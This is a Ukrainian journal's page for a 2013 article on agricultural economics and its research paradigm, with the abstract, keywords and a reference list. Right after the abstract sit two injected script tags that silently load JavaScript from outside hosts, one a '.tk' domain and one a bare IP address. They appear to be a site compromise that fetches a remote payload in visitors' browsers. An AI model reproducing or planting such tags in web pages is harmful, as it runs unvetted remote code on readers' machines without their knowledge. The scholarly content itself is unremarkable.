ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 330.1
Проблеми економічної теорії

Економіка сільського господарства: наука та її сучасна парадигма / Олійник Т. І., Шиян В. Й., Шиян Д.В. // Економіка АПК. - 2013. - № 4 - С. 94

Обгрунтовано, що економіка сільського господарства як галузева економічна наука має свій об’єкт в економічній системі і вивчає закони та закономірності функціонування й розвитку як виробничих відносин, так і продуктивних сил. Визначено парадигму сучасної економіки сільського господарства, місце і роль продуктивних сил в ролі предмета дослідження. Показано взаємозв’язок понять «виробничий потенціал» та «продуктив-ні сили». Окремо досліджено співвідношення економіки сільського господарства з економічною теорією. Підкреслюється необхідність дослідження дії законів і закономірностей на прикладі конкретних галузей економіки. Бібліогр.: 20.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: виробничий потенціал, продуктивні сили, методологія, парадигма, економічна теорія, закони і закономірності

Список використаних джерел

 1. Андрійчук В.Г. Економіка аграрних підприємств: підруч. / В.Г. Андрійчук. – К.: КНЕУ, 2004. – 624 с.
 2. Андрийчук В.Г. Эффективность использования производственного потенциала в сельском хозяйстве / В.Г. Андрийчук. – М.: Экономика, 1983.
 3. Гальчинський А.С. Економічний розвиток, методологія оновлення парадигми / А.С. Гальчинський // Економіка України. –2012. – № 5. – С. 4 – 17.
 4. Економіка знань модернізаційний проект України / за ред. В.М. Гейця, В.П. Семиноженка, Б.Е. Кваснюка. – К.: Фенікс, 2007. – С. 33.
 5. Економіка підприємства: підруч. /Р.В Горбонос, В.Г. Черевко, Н.Д. Павленчик, А.О. Павленчик. – К.: Знання. 2010. – 464 с.
 6. Економіка сільського господарства: навч. посіб. / В.К. Збарський, В.І. Мацибора, А.А. Чалий та ін.; за ред. В.К. Збарського, В.І. Мацибори. – К.: Каравела, 2009. – 264 с.
 7. Економіка сільського господарства: підруч. / О.І. Здоровцов, Л.І. Касьянов, В.І. Мацибора, В.Й. Шиян; за ред. О.І. Здоровцова, В.І. Мацибори. – К.: Вид-во УСГА, 1993. – 320 с.
 8. Економічна теорія: політекономія: підруч.; за ред. В.Д. Базилевича. – К.: Знання – Прес, 2007. – 720 с.
 9. Єременко В. Проблеми логіки, методології класифікації / В. Єременко // Економіка України – 2005. – № 12. – С. 52 – 64.
 10. Лупенко Ю.О. Сучасне місце аграрної економічної науки / Ю.О. Лупенко // Економіка АПК. – 2010. – № 1. – С. 3.
 11. Наукові основи агропромислового виробництва в зоні Степу України / редкол.: М.В. Зубець (голова) [та ін.] – К.: Аграр. наука, 2010. – 986 с.
 12. Письменная Д. Пути улучшения производственного потенциала / Д. Письменная // Экономика сельского хозяйства. – 1985. – № 5. – С. 35.
 13. Присяжнюк М.В. Виступ на Міжнародній науково-практ. конф. «Стратегічні орієнтири розвитку аграрного сектору економіки України до 2020 року» / М.В. Присяжнюк // Економіка АПК. – 2012. – № 10. – С. 6.
 14. Радаєв В.В. Умови розвитку економічної теорії / В.В. Радаєв // Економічна теорія. – 2003. – №1. – С. 3.
 15. Тарасевич В.М. Предмет макроекономіки / В.М. Тарасевич // Економічна теорія. – 2006. – №3. – С. 66- 88.
 16. Тивончук І. Про предмет і класифікацію економічних наук / І. Тивончук // Економіка України – 1995 . – № 10.
 17. Федулова Л.І. Економічна природа технологій та технологічного розвитку / Л.І. Федулова // Економічна теорія. – 2006. – № 3. – С. 3.
 18. Шиян В.И. Производственный потенциал сельскохозяйственных предприятий и пути улучшения его использования: лекция / Харьк. с.-х. ин-т. им. В.В. Докучаева. – Х., 1985. – 52 с.
 19. Экономика сельского хозяйства: учеб. / О.Ф. Лопатина [и др.]. – М.: Экономика, 1977. – 390 с.
 20. Bell D. The coming of post-industrial society: A venture of social forecasting. — N.Y.: Basic Books, 1973.
Читати статтю: 13_04_13.pdf